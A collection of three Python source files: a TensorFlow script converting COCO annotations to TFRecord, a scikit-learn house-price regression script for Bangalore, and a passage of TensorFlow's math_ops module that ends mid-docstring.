# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
r"""Convert raw COCO dataset to TFRecord format.
This scripts follows the label map decoder format and supports detection
boxes, instance masks and captions.
Example usage:
python create_coco_tf_record.py --logtostderr \
--image_dir="${TRAIN_IMAGE_DIR}" \
--image_info_file="${TRAIN_IMAGE_INFO_FILE}" \
--object_annotations_file="${TRAIN_ANNOTATIONS_FILE}" \
--caption_annotations_file="${CAPTION_ANNOTATIONS_FILE}" \
--output_file_prefix="${OUTPUT_DIR/FILE_PREFIX}" \
--num_shards=100
"""
import collections
import json
import logging
import os
from absl import app # pylint:disable=unused-import
from absl import flags
import numpy as np
from pycocotools import mask
import tensorflow as tf
import multiprocessing as mp
from official.vision.beta.data import tfrecord_lib
flags.DEFINE_boolean(
'include_masks', False, 'Whether to include instance segmentations masks '
'(PNG encoded) in the result. default: False.')
flags.DEFINE_string('image_dir', '', 'Directory containing images.')
flags.DEFINE_string(
'image_info_file', '', 'File containing image information. '
'Tf Examples in the output files correspond to the image '
'info entries in this file. If this file is not provided '
'object_annotations_file is used if present. Otherwise, '
'caption_annotations_file is used to get image info.')
flags.DEFINE_string(
'object_annotations_file', '', 'File containing object '
'annotations - boxes and instance masks.')
flags.DEFINE_string('caption_annotations_file', '', 'File containing image '
'captions.')
flags.DEFINE_string('output_file_prefix', '/tmp/train', 'Path to output file')
flags.DEFINE_integer('num_shards', 32, 'Number of shards for output file.')
FLAGS = flags.FLAGS
logger = tf.get_logger()
logger.setLevel(logging.INFO)
def coco_segmentation_to_mask_png(segmentation, height, width, is_crowd):
"""Encode a COCO mask segmentation as PNG string."""
run_len_encoding = mask.frPyObjects(segmentation, height, width)
binary_mask = mask.decode(run_len_encoding)
if not is_crowd:
binary_mask = np.amax(binary_mask, axis=2)
return tfrecord_lib.encode_binary_mask_as_png(binary_mask)
def coco_annotations_to_lists(bbox_annotations, id_to_name_map,
image_height, image_width, include_masks):
"""Convert COCO annotations to feature lists."""
data = dict((k, list()) for k in
['xmin', 'xmax', 'ymin', 'ymax', 'is_crowd',
'category_id', 'category_names', 'area'])
if include_masks:
data['encoded_mask_png'] = []
num_annotations_skipped = 0
for object_annotations in bbox_annotations:
(x, y, width, height) = tuple(object_annotations['bbox'])
if width <= 0 or height <= 0:
num_annotations_skipped += 1
continue
if x + width > image_width or y + height > image_height:
num_annotations_skipped += 1
continue
data['xmin'].append(float(x) / image_width)
data['xmax'].append(float(x + width) / image_width)
data['ymin'].append(float(y) / image_height)
data['ymax'].append(float(y + height) / image_height)
data['is_crowd'].append(object_annotations['iscrowd'])
category_id = int(object_annotations['category_id'])
data['category_id'].append(category_id)
data['category_names'].append(id_to_name_map[category_id].encode('utf8'))
data['area'].append(object_annotations['area'])
if include_masks:
data['encoded_mask_png'].append(
coco_segmentation_to_mask_png(object_annotations['segmentation'],
image_height, image_width,
object_annotations['iscrowd'])
)
return data, num_annotations_skipped
def bbox_annotations_to_feature_dict(
bbox_annotations, image_height, image_width, id_to_name_map, include_masks):
"""Convert COCO annotations to an encoded feature dict."""
data, num_skipped = coco_annotations_to_lists(
bbox_annotations, id_to_name_map, image_height, image_width,
include_masks)
feature_dict = {
'image/object/bbox/xmin':
tfrecord_lib.convert_to_feature(data['xmin']),
'image/object/bbox/xmax':
tfrecord_lib.convert_to_feature(data['xmax']),
'image/object/bbox/ymin':
tfrecord_lib.convert_to_feature(data['ymin']),
'image/object/bbox/ymax':
tfrecord_lib.convert_to_feature(data['ymax']),
'image/object/class/text':
tfrecord_lib.convert_to_feature(data['category_names']),
'image/object/class/label':
tfrecord_lib.convert_to_feature(data['category_id']),
'image/object/is_crowd':
tfrecord_lib.convert_to_feature(data['is_crowd']),
'image/object/area':
tfrecord_lib.convert_to_feature(data['area']),
}
if include_masks:
feature_dict['image/object/mask'] = (
tfrecord_lib.convert_to_feature(data['encoded_mask_png']))
return feature_dict, num_skipped
def encode_caption_annotations(caption_annotations):
captions = []
for caption_annotation in caption_annotations:
captions.append(caption_annotation['caption'].encode('utf8'))
return captions
def create_tf_example(image,
image_dir,
bbox_annotations=None,
id_to_name_map=None,
caption_annotations=None,
include_masks=False):
"""Converts image and annotations to a tf.Example proto.
Args:
image: dict with keys: [u'license', u'file_name', u'coco_url', u'height',
u'width', u'date_captured', u'flickr_url', u'id']
image_dir: directory containing the image files.
bbox_annotations:
list of dicts with keys: [u'segmentation', u'area', u'iscrowd',
u'image_id', u'bbox', u'category_id', u'id'] Notice that bounding box
coordinates in the official COCO dataset are given as [x, y, width,
height] tuples using absolute coordinates where x, y represent the
top-left (0-indexed) corner. This function converts to the format
expected by the Tensorflow Object Detection API (which is which is
[ymin, xmin, ymax, xmax] with coordinates normalized relative to image
size).
id_to_name_map: a dict mapping category IDs to string names.
caption_annotations:
list of dict with keys: [u'id', u'image_id', u'str'].
include_masks: Whether to include instance segmentations masks
(PNG encoded) in the result. default: False.
Returns:
example: The converted tf.Example
num_annotations_skipped: Number of (invalid) annotations that were ignored.
Raises:
ValueError: if the image pointed to by data['filename'] is not a valid JPEG
"""
image_height = image['height']
image_width = image['width']
filename = image['file_name']
image_id = image['id']
full_path = os.path.join(image_dir, filename)
with tf.io.gfile.GFile(full_path, 'rb') as fid:
encoded_jpg = fid.read()
feature_dict = tfrecord_lib.image_info_to_feature_dict(
image_height, image_width, filename, image_id, encoded_jpg, 'jpg')
num_annotations_skipped = 0
if bbox_annotations:
box_feature_dict, num_skipped = bbox_annotations_to_feature_dict(
bbox_annotations, image_height, image_width, id_to_name_map,
include_masks)
num_annotations_skipped += num_skipped
feature_dict.update(box_feature_dict)
if caption_annotations:
encoded_captions = encode_caption_annotations(caption_annotations)
feature_dict.update(
{'image/caption': tfrecord_lib.convert_to_feature(encoded_captions)})
example = tf.train.Example(features=tf.train.Features(feature=feature_dict))
return example, num_annotations_skipped
def _load_object_annotations(object_annotations_file):
"""Loads object annotation JSON file."""
with tf.io.gfile.GFile(object_annotations_file, 'r') as fid:
obj_annotations = json.load(fid)
images = obj_annotations['images']
id_to_name_map = dict((element['id'], element['name']) for element in
obj_annotations['categories'])
img_to_obj_annotation = collections.defaultdict(list)
logging.info('Building bounding box index.')
for annotation in obj_annotations['annotations']:
image_id = annotation['image_id']
img_to_obj_annotation[image_id].append(annotation)
missing_annotation_count = 0
for image in images:
image_id = image['id']
if image_id not in img_to_obj_annotation:
missing_annotation_count += 1
logging.info('%d images are missing bboxes.', missing_annotation_count)
return img_to_obj_annotation, id_to_name_map
def _load_caption_annotations(caption_annotations_file):
"""Loads caption annotation JSON file."""
with tf.io.gfile.GFile(caption_annotations_file, 'r') as fid:
caption_annotations = json.load(fid)
img_to_caption_annotation = collections.defaultdict(list)
logging.info('Building caption index.')
for annotation in caption_annotations['annotations']:
image_id = annotation['image_id']
img_to_caption_annotation[image_id].append(annotation)
missing_annotation_count = 0
images = caption_annotations['images']
for image in images:
image_id = image['id']
if image_id not in img_to_caption_annotation:
missing_annotation_count += 1
logging.info('%d images are missing captions.', missing_annotation_count)
return img_to_caption_annotation
def _load_images_info(images_info_file):
with tf.io.gfile.GFile(images_info_file, 'r') as fid:
info_dict = json.load(fid)
return info_dict['images']
def generate_annotations(images, image_dir,
img_to_obj_annotation=None,
img_to_caption_annotation=None, id_to_name_map=None,
include_masks=False):
"""Generator for COCO annotations."""
for image in images:
object_annotation = (img_to_obj_annotation.get(image['id'], None) if
img_to_obj_annotation else None)
caption_annotaion = (img_to_caption_annotation.get(image['id'], None) if
img_to_caption_annotation else None)
yield (image, image_dir, object_annotation, id_to_name_map,
caption_annotaion, include_masks)
def _create_tf_record_from_coco_annotations(images_info_file,
image_dir,
output_path,
num_shards,
object_annotations_file=None,
caption_annotations_file=None,
include_masks=False):
"""Loads COCO annotation json files and converts to tf.Record format.
Args:
images_info_file: JSON file containing image info. The number of tf.Examples
in the output tf Record files is exactly equal to the number of image info
entries in this file. This can be any of train/val/test annotation json
files Eg. 'image_info_test-dev2017.json',
'instance_annotations_train2017.json',
'caption_annotations_train2017.json', etc.
image_dir: Directory containing the image files.
output_path: Path to output tf.Record file.
num_shards: Number of output files to create.
object_annotations_file: JSON file containing bounding box annotations.
caption_annotations_file: JSON file containing caption annotations.
include_masks: Whether to include instance segmentations masks
(PNG encoded) in the result. default: False.
"""
logging.info('writing to output path: %s', output_path)
images = _load_images_info(images_info_file)
img_to_obj_annotation = None
img_to_caption_annotation = None
id_to_name_map = None
if object_annotations_file:
img_to_obj_annotation, id_to_name_map = (
_load_object_annotations(object_annotations_file))
if caption_annotations_file:
img_to_caption_annotation = (
_load_caption_annotations(caption_annotations_file))
coco_annotations_iter = generate_annotations(
images, image_dir, img_to_obj_annotation, img_to_caption_annotation,
id_to_name_map=id_to_name_map, include_masks=include_masks)
num_skipped = tfrecord_lib.write_tf_record_dataset(
output_path, coco_annotations_iter, create_tf_example, num_shards)
logging.info('Finished writing, skipped %d annotations.', num_skipped)
def main(_):
assert FLAGS.image_dir, '`image_dir` missing.'
assert (FLAGS.image_info_file or FLAGS.object_annotations_file or
FLAGS.caption_annotations_file), ('All annotation files are '
'missing.')
if FLAGS.image_info_file:
images_info_file = FLAGS.image_info_file
elif FLAGS.object_annotations_file:
images_info_file = FLAGS.object_annotations_file
else:
images_info_file = FLAGS.caption_annotations_file
directory = os.path.dirname(FLAGS.output_file_prefix)
if not tf.io.gfile.isdir(directory):
tf.io.gfile.makedirs(directory)
_create_tf_record_from_coco_annotations(images_info_file, FLAGS.image_dir,
FLAGS.output_file_prefix,
FLAGS.num_shards,
FLAGS.object_annotations_file,
FLAGS.caption_annotations_file,
FLAGS.include_masks)
if __name__ == '__main__':
app.run(main)
|
py | 1a34632da3bc2fb841899232fdd517b49ae50a67 | import pandas as pd
import numpy as np
import pickle
import json
from sklearn.model_selection import train_test_split
from sklearn.linear_model import LinearRegression
from sklearn.model_selection import ShuffleSplit
from sklearn.model_selection import cross_val_score
from sklearn.model_selection import GridSearchCV
from sklearn.linear_model import Lasso
from sklearn.tree import DecisionTreeRegressor
def find_best_model_using_gridsearchcv(X, y):
algos = {
'linear_regression': {
'model': LinearRegression(),
'params': {
'normalize': [True, False]
}
},
'lasso': {
'model': Lasso(),
'params': {
'alpha': [1,2],
'selection': ['random', 'cyclic']
}
},
'decision_tree': {
'model': DecisionTreeRegressor(),
'params': {
'criterion': ['mse', 'friedman_mse'],
'splitter': ['best', 'random']
}
}
}
scores = []
cv = ShuffleSplit(n_splits=5, test_size=0.2, random_state=0)
for algo_name, config in algos.items():
gs = GridSearchCV(config['model'], config['params'], cv=cv, return_train_score=False)
gs.fit(X,y)
scores.append({
'model': algo_name,
'best_score': gs.best_score_,
'best_params': gs.best_params_
})
return pd.DataFrame(scores, columns=['model', 'best_score', 'best_params'])
def predict_price(location, sqft, bath, bhk):
loc_index = np.where(X.columns == location)[0][0]
# print(loc_index, type(loc_index))
x = np.zeros(len(X.columns))
x[0] = sqft
x[1] = bath
x[2] = bhk
if loc_index >= 0:
x[loc_index] = 1
return lr_clf.predict([x])[0]
df = pd.read_csv('data_file_cleaned_feateng_outrem.csv')
print(df.head())
print(df.shape)
# The location variable is textual, but needs to be numeric for model training
# You can use one hot encoding or dummy variables
dummies = pd.get_dummies(df.location)
df2 = pd.concat([df, dummies.drop('other', axis = 'columns')], axis = 'columns')
# Remember to avoid dummy variable trap, we need to drop one column (in this case 'other')
print(df2.head())
# Now define separate your features from your target
X = df2.drop(['location', 'price'], axis = 'columns')
print(df.total_sqft)
print(df.isnull().sum())
y = df2.price
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.2, random_state=10)
lr_clf = LinearRegression()
lr_clf.fit(X_train, y_train)
print(lr_clf.score(X_test, y_test))
# I'm getting a score of 65% which isn't that great
# In practise, we try multiple models and see what works
# We can do a k-fold cross validation
cv = ShuffleSplit(n_splits=5, test_size = 0.2, random_state=0)
cv_scores = cross_val_score(LinearRegression(), X, y, cv=cv)
print(cv_scores)
# What about other regression techniques?
# Here, we need a gridsearch cv (in the massive function at the top)
resultant = find_best_model_using_gridsearchcv(X, y)
print(resultant)
# I wonder if this can be improved by keeping the price in rupees
print(predict_price('1st Phase JP Nagar', 1000, 2, 2))
print(predict_price('1st Phase JP Nagar', 1000, 3, 3))
print(predict_price('Indira Nagar', 1000, 2, 2))
print(predict_price('Indira Nagar', 1000, 3, 3))
# Now we can export the data by pickling
# We also need the column index from our encoding
with open('bangalore_home_prices_model.pickle', 'wb') as f:
pickle.dump(lr_clf, f)
columns = {
'data_columns': [col.lower() for col in X.columns]
}
with open('columns.json', 'w') as f:
f.write(json.dumps(columns))
|
py | 1a34634cf2816a88d12c2cc4e664980ce8fbd704 | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Note: Elementwise binary operations in TensorFlow follow [numpy-style
broadcasting](http://docs.scipy.org/doc/numpy/user/basics.broadcasting.html).
## Arithmetic Operators
TensorFlow provides several operations that you can use to add basic arithmetic
operators to your graph.
@@add
@@sub
@@mul
@@scalar_mul
@@div
@@truediv
@@floordiv
@@mod
@@cross
## Basic Math Functions
TensorFlow provides several operations that you can use to add basic
mathematical functions to your graph.
@@add_n
@@abs
@@neg
@@sign
@@inv
@@square
@@round
@@sqrt
@@rsqrt
@@pow
@@exp
@@log
@@ceil
@@floor
@@maximum
@@minimum
@@cos
@@sin
@@lbeta
@@tan
@@acos
@@asin
@@atan
@@lgamma
@@digamma
@@erf
@@erfc
@@squared_difference
@@igamma
@@igammac
@@zeta
@@polygamma
@@betainc
## Matrix Math Functions
TensorFlow provides several operations that you can use to add linear algebra
functions on matrices to your graph.
@@diag
@@diag_part
@@trace
@@transpose
@@eye
@@matrix_diag
@@matrix_diag_part
@@matrix_band_part
@@matrix_set_diag
@@matrix_transpose
@@matmul
@@batch_matmul
@@matrix_determinant
@@matrix_inverse
@@cholesky
@@cholesky_solve
@@matrix_solve
@@matrix_triangular_solve
@@matrix_solve_ls
@@self_adjoint_eig
@@self_adjoint_eigvals
@@svd
## Complex Number Functions
TensorFlow provides several operations that you can use to add complex number
functions to your graph.
@@complex
@@complex_abs
@@conj
@@imag
@@real
## Fourier Transform Functions
TensorFlow provides several operations that you can use to add discrete
Fourier transform functions to your graph.
@@fft
@@ifft
@@fft2d
@@ifft2d
@@fft3d
@@ifft3d
## Reduction
TensorFlow provides several operations that you can use to perform
common math computations that reduce various dimensions of a tensor.
@@reduce_sum
@@reduce_prod
@@reduce_min
@@reduce_max
@@reduce_mean
@@reduce_all
@@reduce_any
@@reduce_logsumexp
@@count_nonzero
@@accumulate_n
@@einsum
## Scan
TensorFlow provides several operations that you can use to perform scans
(running totals) across one axis of a tensor.
@@cumsum
@@cumprod
## Segmentation
TensorFlow provides several operations that you can use to perform common
math computations on tensor segments.
Here a segmentation is a partitioning of a tensor along
the first dimension, i.e. it defines a mapping from the first dimension onto
`segment_ids`. The `segment_ids` tensor should be the size of
the first dimension, `d0`, with consecutive IDs in the range `0` to `k`,
where `k<d0`.
In particular, a segmentation of a matrix tensor is a mapping of rows to
segments.
For example:
```python
c = tf.constant([[1,2,3,4], [-1,-2,-3,-4], [5,6,7,8]])
tf.segment_sum(c, tf.constant([0, 0, 1]))
==> [[0 0 0 0]
[5 6 7 8]]
```
@@segment_sum
@@segment_prod
@@segment_min
@@segment_max
@@segment_mean
@@unsorted_segment_sum
@@sparse_segment_sum
@@sparse_segment_mean
@@sparse_segment_sqrt_n
## Sequence Comparison and Indexing
TensorFlow provides several operations that you can use to add sequence
comparison and index extraction to your graph. You can use these operations to
determine sequence differences and determine the indexes of specific values in
a tensor.
@@argmin
@@argmax
@@listdiff
@@where
@@unique
@@edit_distance
@@invert_permutation
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.python.framework import common_shapes
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import graph_util
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import gen_control_flow_ops
from tensorflow.python.ops import gen_data_flow_ops
from tensorflow.python.ops import gen_math_ops
from tensorflow.python.ops import gen_sparse_ops
from tensorflow.python.ops import gen_state_ops
from tensorflow.python.ops import state_ops
# go/tf-wildcard-import
# pylint: disable=wildcard-import
from tensorflow.python.ops.gen_math_ops import *
# pylint: enable=wildcard-import
# Aliases for some automatically-generated names.
argmax = gen_math_ops.arg_max
argmin = gen_math_ops.arg_min
linspace = gen_math_ops.lin_space
# pylint: disable=anomalous-backslash-in-string,protected-access
def abs(x, name=None):
"""Computes the absolute value of a tensor.
Given a tensor of real numbers `x`, this operation returns a tensor
containing the absolute value of each element in `x`. For example, if x is
an input element and y is an output element, this operation computes
\\\\(y = |x|\\\\).
See [`tf.complex_abs()`](#tf_complex_abs) to compute the absolute value of a complex
number.
Args:
x: A `Tensor` or `SparseTensor` of type `float32`, `float64`, `int32`, or
`int64`.
name: A name for the operation (optional).
Returns:
A `Tensor` or `SparseTensor` the same size and type as `x` with absolute
values.
"""
with ops.name_scope(name, "Abs", [x]) as name:
if isinstance(x, ops.SparseTensor):
if x.values.dtype in (dtypes.complex64, dtypes.complex128):
x_abs = gen_math_ops.complex_abs(x.values,
Tout=x.values.dtype.real_dtype, name=name)
return ops.SparseTensor(indices=x.indices, values=x_abs, shape=x.shape)
x_abs = gen_math_ops._abs(x.values, name=name)
return ops.SparseTensor(indices=x.indices, values=x_abs, shape=x.shape)
else:
x = ops.convert_to_tensor(x, name="x")
if x.dtype in (dtypes.complex64, dtypes.complex128):
return gen_math_ops.complex_abs(x, Tout=x.dtype.real_dtype, name=name)
return gen_math_ops._abs(x, name=name)
def divide(x, y, name=None):
"""Computes Python style division of `x` by `y`."""
with ops.name_scope(name, "Divide", [x]) as name:
return x / y
def neg(x, name=None):
"""Computes numerical negative value element-wise.
I.e., \\(y = -x\\).
Args:
x: A `Tensor` or `SparseTensor`. Must be one of the following types: `half`,
`float32`, `float64`, `int32`, `int64`, `complex64`, `complex128`.
name: A name for the operation (optional).
Returns:
A `Tensor` or `SparseTensor`, respectively. Has the same type as `x`.
"""
with ops.name_scope(name, "Neg", [x]) as name:
if isinstance(x, ops.SparseTensor):
x_neg = gen_math_ops.neg(x.values, name=name)
return ops.SparseTensor(indices=x.indices, values=x_neg, shape=x.shape)
else:
return gen_math_ops.neg(x, name=name)
def sign(x, name=None):
"""Returns an element-wise indication of the sign of a number.
`y = sign(x) = -1` if `x < 0`; 0 if `x == 0`; 1 if `x > 0`.
For complex numbers, `y = sign(x) = x / |x|` if `x != 0`, otherwise `y = 0`.
Args:
x: A `Tensor` or `SparseTensor`. Must be one of the following types: `half`,
`float32`, `float64`, `int32`, `int64`, `complex64`, `complex128`.
name: A name for the operation (optional).
Returns:
A `Tensor` or `SparseTensor`, respectively. Has the same type as `x`.
"""
with ops.name_scope(name, "Sign", [x]) as name:
if isinstance(x, ops.SparseTensor):
x_sign = gen_math_ops.sign(x.values, name=name)
return ops.SparseTensor(indices=x.indices, values=x_sign, shape=x.shape)
else:
return gen_math_ops.sign(x, name=name)
def square(x, name=None):
"""Computes square of x element-wise.
I.e., \\(y = x * x = x^2\\).
Args:
x: A `Tensor` or `SparseTensor`. Must be one of the following types: `half`,
`float32`, `float64`, `int32`, `int64`, `complex64`, `complex128`.
name: A name for the operation (optional).
Returns:
A `Tensor` or `SparseTensor`. Has the same type as `x`.
"""
with ops.name_scope(name, "Square", [x]) as name:
if isinstance(x, ops.SparseTensor):
x_square = gen_math_ops.square(x.values, name=name)
return ops.SparseTensor(indices=x.indices, values=x_square, shape=x.shape)
else:
return gen_math_ops.square(x, name=name)
def sqrt(x, name=None):
"""Computes square root of x element-wise.
I.e., \\(y = \sqrt{x} = x^{1/2}\\).
Args:
x: A `Tensor` or `SparseTensor`. Must be one of the following types: `half`,
`float32`, `float64`, `complex64`, `complex128`.
name: A name for the operation (optional).
Returns:
A `Tensor` or `SparseTensor`, respectively. Has the same type as `x`.
"""
with ops.name_scope(name, "Sqrt", [x]) as name:
if isinstance(x, ops.SparseTensor):
x_sqrt = gen_math_ops.sqrt(x.values, name=name)
return ops.SparseTensor(indices=x.indices, values=x_sqrt, shape=x.shape)
else:
return gen_math_ops.sqrt(x, name=name)
def erf(x, name=None):
"""Computes the Gauss error function of `x` element-wise.
Args:
x: A `Tensor` of `SparseTensor`. Must be one of the following types: `half`,
`float32`, `float64`.
name: A name for the operation (optional).
Returns:
A `Tensor` or `SparseTensor`, respectively. Has the same type as `x`.
"""
with ops.name_scope(name, "Erf", [x]) as name:
if isinstance(x, ops.SparseTensor):
x_erf = gen_math_ops.erf(x.values, name=name)
return ops.SparseTensor(indices=x.indices, values=x_erf, shape=x.shape)
else:
return gen_math_ops.erf(x, name=name)
def complex_abs(x, name=None):
r"""Computes the complex absolute value of a tensor.
Given a tensor `x` of complex numbers, this operation returns a tensor of type
`float32` or `float64` that is the absolute value of each element in `x`. All
elements in `x` must be complex numbers of the form \\(a + bj\\). The
absolute value is computed as \\( \sqrt{a^2 + b^2}\\).
For example:
```
# tensor 'x' is [[-2.25 + 4.75j], [-3.25 + 5.75j]]
tf.complex_abs(x) ==> [5.25594902, 6.60492229]
```
Args:
x: A `Tensor` of type `complex64` or `complex128`.
name: A name for the operation (optional).
Returns:
A `Tensor` of type `float32` or `float64`.
"""
return gen_math_ops.complex_abs(x, Tout=x.dtype.real_dtype, name=name)
def scalar_mul(scalar, x):
"""Multiplies a scalar times a `Tensor` or `IndexedSlices` object.
Intended for use in gradient code which might deal with `IndexedSlices`
objects, which are easy to multiply by a scalar but more expensive to
multiply with arbitrary tensors.
Args:
scalar: A 0-D scalar `Tensor`. Must have known shape.
x: A `Tensor` or `IndexedSlices` to be scaled.
Returns:
`scalar * x` of the same type (`Tensor` or `IndexedSlices`) as `x`.
Raises:
ValueError: if scalar is not a 0-D `scalar`.
"""
scalar = ops.convert_to_tensor(scalar, dtype=x.dtype.base_dtype,
name="scalar")
shape = scalar.get_shape()
if shape.ndims == 0:
if isinstance(x, ops.IndexedSlices):
return ops.IndexedSlices(scalar * x.values, x.indices, x.dense_shape)
else:
return scalar * x
else:
raise ValueError("Only scalar multiply works, got shape %s" % shape)
def pow(x, y, name=None):
"""Computes the power of one value to another.
Given a tensor `x` and a tensor `y`, this operation computes \\\\(x^y\\\\) for
corresponding elements in `x` and `y`. For example:
```
# tensor 'x' is [[2, 2], [3, 3]]
# tensor 'y' is [[8, 16], [2, 3]]
tf.pow(x, y) ==> [[256, 65536], [9, 27]]
```
Args:
x: A `Tensor` of type `float32`, `float64`, `int32`, `int64`, `complex64`,
or `complex128`.
y: A `Tensor` of type `float32`, `float64`, `int32`, `int64`, `complex64`,
or `complex128`.
name: A name for the operation (optional).
Returns:
A `Tensor`.
"""
with ops.name_scope(name, "Pow", [x]) as name:
return gen_math_ops._pow(x, y, name=name)
def complex(real, imag, name=None):
"""Converts two real numbers to a complex number.
Given a tensor `real` representing the real part of a complex number, and a
tensor `imag` representing the imaginary part of a complex number, this
operation returns complex numbers elementwise of the form \\(a + bj\\), where
*a* represents the `real` part and *b* represents the `imag` part.
The input tensors `real` and `imag` must have the same shape.
For example:
```
# tensor 'real' is [2.25, 3.25]
# tensor `imag` is [4.75, 5.75]
tf.complex(real, imag) ==> [[2.25 + 4.75j], [3.25 + 5.75j]]
```
Args:
real: A `Tensor`. Must be one of the following types: `float32`, `float64`.
imag: A `Tensor`. Must have the same type as `real`.
name: A name for the operation (optional).
Returns:
A `Tensor` of type `complex64` or `complex128`.
"""
real = ops.convert_to_tensor(real, name="real")
imag = ops.convert_to_tensor(imag, name="imag")
with ops.name_scope(name, "Complex", [real, imag]) as name:
input_types = (real.dtype, imag.dtype)
if input_types == (dtypes.float64, dtypes.float64):
Tout = dtypes.complex128
elif input_types == (dtypes.float32, dtypes.float32):
Tout = dtypes.complex64
else:
raise TypeError("real and imag have incorrect types: "
"{} {}".format(real.dtype.name, imag.dtype.name))
return gen_math_ops._complex(real, imag, Tout=Tout, name=name)
def real(input, name=None):
"""Returns the real part of a complex number.
Given a tensor `input` of complex numbers, this operation returns a tensor of
type `float32` or `float64` that is the real part of each element in `input`.
All elements in `input` must be complex numbers of the form \\(a + bj\\),
where *a* is the real part returned by this operation and *b* is the
imaginary part.
For example:
```
# tensor 'input' is [-2.25 + 4.75j, 3.25 + 5.75j]
tf.real(input) ==> [-2.25, 3.25]
```
If `input` is already real, it is returned unchanged.
Args:
input: A `Tensor`. Must have numeric type.
name: A name for the operation (optional).
Returns:
A `Tensor` of type `float32` or `float64`.
"""
with ops.name_scope(name, "Real", [input]) as name:
real_dtype = input.dtype.real_dtype
if input.dtype.base_dtype == real_dtype:
return input
return gen_math_ops.real(input, Tout=real_dtype, name=name)
def imag(input, name=None):
"""Returns the imaginary part of a complex number.
Given a tensor `input` of complex numbers, this operation returns a tensor of
type `float32` or `float64` that is the imaginary part of each element in
`input`. All elements in `input` must be complex numbers of the form \\(a +
bj\\), where *a* is the real part and *b* is the imaginary part returned by
this operation.
For example:
```
# tensor 'input' is [-2.25 + 4.75j, 3.25 + 5.75j]
tf.imag(input) ==> [4.75, 5.75]
```
Args:
input: A `Tensor`. Must be one of the following types: `complex64`, `complex128`.
name: A name for the operation (optional).
Returns:
A `Tensor` of type `float32` or `float64`.
"""
with ops.name_scope(name, "Imag", [input]) as name:
return gen_math_ops.imag(input, Tout=input.dtype.real_dtype, name=name)
def round(x, name=None):
"""Rounds the values of a tensor to the nearest integer, element-wise.
Rounds half to even. Also known as bankers rounding. If you want to round
according to the current system rounding mode use tf::cint.
For example:
```python
# 'a' is [0.9, 2.5, 2.3, 1.5, -4.5]
tf.round(a) ==> [ 1.0, 2.0, 2.0, 2.0, -4.0 ]
```
Args:
x: A `Tensor` of type `float32` or `float64`.
name: A name for the operation (optional).
Returns:
A `Tensor` of same shape and type as `x`.
"""
x = ops.convert_to_tensor(x, name="x")
if x.dtype.is_integer:
return x
else:
# TODO(nolivia): Switch to new Round op
# return gen_math_ops.round(x, name=name)
return gen_math_ops.floor(x + 0.5, name=name)
ops.RegisterShape("Round")(common_shapes.call_cpp_shape_fn)
def cast(x, dtype, name=None):
"""Casts a tensor to a new type.
The operation casts `x` (in case of `Tensor`) or `x.values`
(in case of `SparseTensor`) to `dtype`.
For example:
```python
# tensor `a` is [1.8, 2.2], dtype=tf.float
tf.cast(a, tf.int32) ==> [1, 2] # dtype=tf.int32
```
Args:
x: A `Tensor` or `SparseTensor`.
dtype: The destination type.
name: A name for the operation (optional).
Returns:
A `Tensor` or `SparseTensor` with same shape as `x`.
Raises:
TypeError: If `x` cannot be cast to the `dtype`.
"""
base_type = dtypes.as_dtype(dtype).base_dtype
with ops.name_scope(name, "Cast", [x]) as name:
if isinstance(x, ops.SparseTensor):
values_cast = cast(x.values, base_type, name=name)
return ops.SparseTensor(x.indices, values_cast, x.shape)
else:
# TODO(touts): Handle what Josh said.
#
# Could return ops.convert_to_tensor(x, dtype=dtype, ...) here, but that
# allows some conversions that cast() can't do, e.g. casting numbers to
# strings.
x = ops.convert_to_tensor(x, name="x")
if x.dtype.base_dtype == base_type:
return x
return gen_math_ops.cast(x, base_type, name=name)
def saturate_cast(value, dtype, name=None):
"""Performs a safe saturating cast of `value` to `dtype`.
This function casts the input to `dtype` without applying any scaling. If
there is a danger that values would over or underflow in the cast, this op
applies the appropriate clamping before the cast.
Args:
value: A `Tensor`.
dtype: The desired output `DType`.
name: A name for the operation (optional).
Returns:
`value` safely cast to `dtype`.
"""
# When casting to a type with smaller representable range, clamp.
# Note that this covers casting to unsigned types as well.
with ops.name_scope(name, "saturate_cast", [value]) as name:
value = ops.convert_to_tensor(value, name="value")
dtype = dtypes.as_dtype(dtype).base_dtype
if value.dtype.min < dtype.min:
value = gen_math_ops.maximum(value, ops.convert_to_tensor(
dtype.min, dtype=value.dtype, name="min"))
if value.dtype.max > dtype.max:
value = gen_math_ops.minimum(value, ops.convert_to_tensor(
dtype.max, dtype=value.dtype, name="max"))
return cast(value, dtype, name=name)
def to_float(x, name="ToFloat"):
"""Casts a tensor to type `float32`.
Args:
x: A `Tensor` or `SparseTensor`.
name: A name for the operation (optional).
Returns:
A `Tensor` or `SparseTensor` with same shape as `x` with type `float32`.
Raises:
TypeError: If `x` cannot be cast to the `float32`.
"""
return cast(x, dtypes.float32, name=name)
def to_double(x, name="ToDouble"):
"""Casts a tensor to type `float64`.
Args:
x: A `Tensor` or `SparseTensor`.
name: A name for the operation (optional).
Returns:
A `Tensor` or `SparseTensor` with same shape as `x` with type `float64`.
Raises:
TypeError: If `x` cannot be cast to the `float64`.
"""
return cast(x, dtypes.float64, name=name)
def to_int32(x, name="ToInt32"):
"""Casts a tensor to type `int32`.
Args:
x: A `Tensor` or `SparseTensor`.
name: A name for the operation (optional).
Returns:
A `Tensor` or `SparseTensor` with same shape as `x` with type `int32`.
Raises:
TypeError: If `x` cannot be cast to the `int32`.
"""
